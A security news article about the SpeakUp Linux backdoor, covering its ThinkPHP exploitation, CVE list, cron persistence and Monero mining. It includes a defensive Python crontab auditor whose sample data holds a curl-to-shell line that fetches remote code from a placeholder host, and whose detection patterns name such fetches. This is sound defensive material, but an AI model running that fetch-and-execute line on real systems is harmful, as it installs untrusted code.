How the 'SpeakUp' Linux Backdoor Hijacks Servers and Mines Monero
A newly discovered Linux backdoor called SpeakUp, exploiting the ThinkPHP CVE‑2018‑20062 flaw, spreads via a built‑in Python script, hijacks cron for persistence, leverages multiple CVEs to compromise servers, and mines Monero, with infections concentrated in China and South America.
A new Linux backdoor named SpeakUp has begun spreading, primarily targeting Linux servers in China.
Discovered three weeks ago by Check Point researchers, SpeakUp exploits the ThinkPHP framework vulnerability CVE‑2018‑20062, allowing attackers to execute arbitrary PHP code, modify local cron jobs for persistence, run shell commands, and download or update files from a remote command‑and‑control server.
The malware includes a built‑in Python script that propagates laterally across the local network, scanning for open ports, brute‑forcing credentials with a predefined list, and compromising unpatched systems using one of several known vulnerabilities:
CVE‑2012‑0874: JBoss Enterprise Application Platform multiple security bypass
CVE‑2010‑1871: JBoss Seam Framework remote code execution
JBoss AS 3/4/5/6: remote command execution
CVE‑2017‑10271: Oracle WebLogic wls‑wsat component deserialization RCE
CVE‑2018‑2894: Oracle Fusion Middleware WebLogic Server component vulnerability
Hadoop YARN ResourceManager: command execution
CVE‑2016‑3088: Apache ActiveMQ file upload remote code execution
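The cron hijack described above (a scheduled entry that fetches and runs code from a remote host) is the persistence step a defender can check for. Below is an added example, not code from Check Point or from the report, that audits crontab text for download-and-execute patterns; the sample crontab lines and the three heuristics are constructed assumptions, not indicators from this article.

```python
import re

# Constructed sample crontab (not from the Check Point report):
# one benign entry, one remote fetch piped to a shell, one loader run from /tmp.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://example.invalid/update.sh | sh
@reboot /usr/bin/python /tmp/.x/loader.py
"""

# Heuristics (assumed, tune for your environment): a network fetch in a cron
# command, a pipe into an interpreter, or execution from a scratch directory.
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*https?://", re.IGNORECASE)
PIPE_TO_INTERP = re.compile(r"\|\s*(sh|bash|python[0-9.]*|perl)\b")
SCRATCH_DIR = re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+")


def audit_crontab(text):
    """Return [(line_no, entry, [reasons])] for entries matching any heuristic.

    Comment lines and blank lines are skipped; the whole command field is
    searched, so the function works for both user crontabs and /etc/crontab.
    """
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = []
        if REMOTE_FETCH.search(entry):
            reasons.append("remote fetch")
        if PIPE_TO_INTERP.search(entry):
            reasons.append("pipe to interpreter")
        if SCRATCH_DIR.search(entry):
            reasons.append("executes from scratch dir")
        if reasons:
            findings.append((line_no, entry, reasons))
    return findings


if __name__ == "__main__":
    for line_no, entry, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: {', '.join(reasons)} :: {entry}")
```

Feed it the output of `crontab -l` for each user and the contents of /etc/crontab and /etc/cron.d/* to review a host; matches are leads to inspect, not verdicts.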
Check Point reports that SpeakUp can run on six different Linux distributions and even macOS, and the attackers have been using the backdoor to deploy Monero cryptocurrency miners, already harvesting about 107 Monero (≈ US $4,500).
Infection maps show most victims are in Asia and South America, with China being the primary hotspot.
Researchers note that, so far, the attackers have only leveraged the ThinkPHP CVE‑2018‑20062 exploit, but they could easily switch to other vulnerabilities to broaden SpeakUp’s reach.
Source: Open Source China